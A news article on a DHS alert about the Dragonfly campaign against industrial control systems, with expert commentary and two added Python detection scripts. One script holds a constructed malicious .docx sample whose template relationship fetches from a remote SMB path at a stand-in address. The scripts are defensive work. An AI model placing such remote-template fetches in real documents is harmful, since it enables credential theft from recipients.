DHS' Dragonfly ICS campaign alert isn't enough, experts say

The Department of Homeland Security released an alert confirming the Dragonfly ICS cyberattack campaign, but experts said more action is needed to protect critical infrastructure.

A new government warning added details about cyberattacks targeting critical control systems, but experts said the industry needs more funding and action, rather than alerts, to secure infrastructure.

The Department of Homeland Security (DHS) issued an alert Friday, stating that an advanced persistent threat group -- labeled as Dragonfly by a September report from Symantec -- has "targeted government entities and the energy, water, aviation, nuclear and critical manufacturing sectors," with specific focus on industrial control systems (ICS).

According to the DHS, the Dragonfly ICS campaign comprised "two distinct categories of victims: staging and intended targets."

"The initial victims are peripheral organizations such as trusted third party suppliers with less secure networks ... The threat actor uses the staging targets' networks as pivot points and malware repositories when targeting their final intended victims," DHS wrote in the alert. "The ultimate objective of the cyber threat actors is to compromise organizational networks."

Dragonfly ICS attack patterns

The alert detailed how the Dragonfly ICS campaign used multiple different attacks to steal login credentials, including:

  • spear phishing attacks using "legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block protocol";
  • spear phishing attacks aimed at luring targets to a website where they would be prompted to retrieve a malicious file; and
  • phishing attacks with fake login pages or malicious Microsoft Word files and watering-hole attacks.

DHS said the Dragonfly ICS campaign would make use of the stolen credentials "to access victims' networks where multi-factor authentication [was] not used" to set up persistent access.
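The first attack pattern above relies on Office retrieving a document from a remote server over SMB. In an OOXML package that retrieval is declared as a relationship whose target lies outside the package (an attached template on a UNC path, for instance, marked TargetMode="External"), so a mail gateway or analyst can find it without opening the file in Word. The script below is an added example, not code from the DHS alert, Symantec or this article: it unpacks a .docx in memory and lists every relationship that would make Office contact another host. The package builder, the two sample documents and the 203.0.113.5 address are constructed for the demonstration.

```python
"""List Office relationships that point outside the document package.

Added example (not from the DHS alert or the article). Documents that pull
content from a remote server over SMB declare that fetch as a relationship
with TargetMode="External" (or a UNC/URL target). This unpacks a .docx and
reports such relationships so the file can be quarantined or triaged.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Targets that stay inside the package are fine; a UNC path or URL means Word
# will reach out to another host when the file is opened.
REMOTE_TARGET = re.compile(r"^(\\\\|//|https?://|file://)", re.IGNORECASE)


def external_relationships(docx_bytes):
    """Return [(part_name, short_rel_type, target)] for every external relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.findall(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if external or REMOTE_TARGET.match(target):
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, short_type, target))
    return findings


def is_suspicious(docx_bytes):
    """True when any relationship would make Office contact another host."""
    return bool(external_relationships(docx_bytes))


def _build_docx(settings_rels_xml):
    """Construct a minimal .docx-like zip in memory (sample data, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
    return buf.getvalue()


# Constructed sample: attached template on a UNC path at a TEST-NET (documentation) address.
BAD_DOCX = _build_docx(
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="\\\\203.0.113.5\\share\\template.dotx" TargetMode="External"/>'
    "</Relationships>"
)

# Constructed sample: a template reference that stays inside the package.
GOOD_DOCX = _build_docx(
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="templates/Normal.dotm"/>'
    "</Relationships>"
)

if __name__ == "__main__":
    for label, doc in (("constructed-bad.docx", BAD_DOCX), ("constructed-good.docx", GOOD_DOCX)):
        print(label, "->", external_relationships(doc) or "no external relationships")
```

Ordinary hyperlinks are also stored as external relationships, so on real mail flow you would narrow the rule to relationship types that Office resolves automatically on open (attached templates, linked OLE objects, external images) or treat UNC targets as the high-confidence signal; the point of the check is that the remote fetch is visible in the package metadata before the document is ever rendered.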

Paul Edon, director of international customer services at Tripwire, based in Portland, Ore., said the Dragonfly ICS attacks are "nothing new, but they should act to remind us that industrial control systems that were once protected by air gap and diode architecture are now becoming physical extensions to corporate and business networks."

"There is no dispute that connectivity provides many business advantages, such as centralized management and control, remote engineering access and resource consolidation," Edon told SearchSecurity. "However, it's important to remember that it also brings with it a large number of additional risks, mainly increased attack vectors, exposure of inherently insecure and sometimes obsolete IT systems, and the opportunity for attackers to exploit vulnerabilities that may have been around for a decade or more, but for various valid reasons have not been patched."

Mitigating the risks of the Dragonfly ICS campaign

The DHS alert provided IP addresses, domain names, file hashes, and YARA and Snort signatures associated with the Dragonfly ICS attacks and urged network admins to check for intrusions on their systems and block malicious sources. DHS also included a long list of ways to detect spear phishing attacks, watering holes, web shells, remote access activity and malicious persistence.
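Alongside matching the published indicators, the SMB-based document retrieval described earlier leaves a network-level trace that needs no indicator list at all: the workstation that opens the document connects out on TCP/445 (or 139) to a host outside the organisation, a flow most networks have no legitimate reason to allow. The script below is an added example, not from the DHS alert or this article, that scans firewall log lines for internal-to-external SMB flows. The key=value log format, the RFC 1918 internal address plan and the sample lines (using the 203.0.113.0/24 and 198.51.100.0/24 documentation ranges) are assumptions constructed for the demonstration.

```python
"""Flag SMB connections from internal hosts to destinations outside the organisation.

Added example; not from the DHS alert or the article. The log format
(key=value tokens) and the internal address ranges are assumptions.
"""
import ipaddress

SMB_PORTS = {139, 445}

# Assumed internal address plan (RFC 1918); replace with the organisation's own ranges.
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# Constructed sample lines; the external addresses are documentation ranges.
SAMPLE_LOG = """\
ts=2017-10-20T14:02:11Z action=allow proto=tcp src=10.20.5.17 dst=10.20.1.4 dport=445
ts=2017-10-20T14:03:45Z action=allow proto=tcp src=10.20.5.17 dst=203.0.113.5 dport=445
ts=2017-10-20T14:03:46Z action=allow proto=tcp src=10.20.5.17 dst=203.0.113.5 dport=443
ts=2017-10-20T14:05:02Z action=deny proto=tcp src=10.20.7.9 dst=198.51.100.7 dport=139
malformed line without fields
"""


def is_internal(addr):
    """True when the address falls inside one of the assumed internal ranges."""
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line):
    """Split a key=value firewall line into a dict; tokens without '=' are ignored."""
    fields = {}
    for token in line.split():
        if "=" in token:
            key, value = token.split("=", 1)
            fields[key] = value
    return fields


def outbound_smb_flows(log_text):
    """Return (ts, src, dst, dport, action) for internal->external SMB flows.

    Denied flows are reported too: a blocked attempt still tells you which
    workstation opened a document that tried to reach out over SMB.
    """
    hits = []
    for line in log_text.splitlines():
        f = parse_line(line)
        try:
            src = ipaddress.ip_address(f["src"])
            dst = ipaddress.ip_address(f["dst"])
            dport = int(f["dport"])
        except (KeyError, ValueError):
            continue  # incomplete or malformed record
        if f.get("proto") != "tcp" or dport not in SMB_PORTS:
            continue
        if is_internal(src) and not is_internal(dst):
            hits.append((f.get("ts"), str(src), str(dst), dport, f.get("action")))
    return hits


if __name__ == "__main__":
    for hit in outbound_smb_flows(SAMPLE_LOG):
        print("outbound SMB:", hit)
```

The check deliberately uses an explicit list of internal ranges rather than the library's is_private property, because that property also covers documentation and other special-purpose ranges and would hide exactly the kind of external destination this detection exists to surface; in production the list is the organisation's real address plan, and the hits feed the same triage as the alert's indicator matches.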

Michael Daly, CTO of cybersecurity and special missions at Raytheon, based in Waltham, Mass., applauded the Dragonfly ICS alert for "sharing important security information with the private sector about the growing threats to the nation's critical infrastructure."

"Cybersecurity is no longer just a matter of protecting stored data like credit cards. It is now the protection of the systems that run critical industries -- energy, transportation, healthcare and finance -- all the things that enable our modern way of life," Daly told SearchSecurity. "The adversaries we face are persistent and well-resourced. Their cyberattacks are changing constantly. One of their favorite techniques is installing backdoors to maintain a foothold in our systems they could use during a time of crisis."

More needs to be done

However, not all experts were as positive about the DHS warning. Satya Gupta, founder and CTO for threat protection vendor Virsec Systems, based in San Jose, Calif., said the "security recommendations are inadequate."

"The security mindset of watching for anomalies at the perimeter often becomes the equivalent of closing the barn door after the horses have bolted. Perimeters are inevitably porous, and the air gaps that many ICS systems were designed around have disappeared," Gupta told SearchSecurity. "Our security focus needs to shift from the network perimeter to the applications themselves. By closely monitoring application flows, processes and memory, you can spot unusual behavior at the source and take action faster and more surgically, before damage occurs or spreads."

Tim Erlin, vice president of product management and strategy at Tripwire, said the Dragonfly ICS alert is only one part of making infrastructure more secure.

"This public warning from the U.S. government should be taken seriously, but it's only the latest in a long series of warnings from within the cybersecurity industry," Erlin told SearchSecurity. "Experts working on cybersecurity for critical infrastructure know the risks and the stakes and are already working to address them. Warnings like this are an important aspect of information sharing, but they don't materially change funding levels, resources or skill sets by themselves."
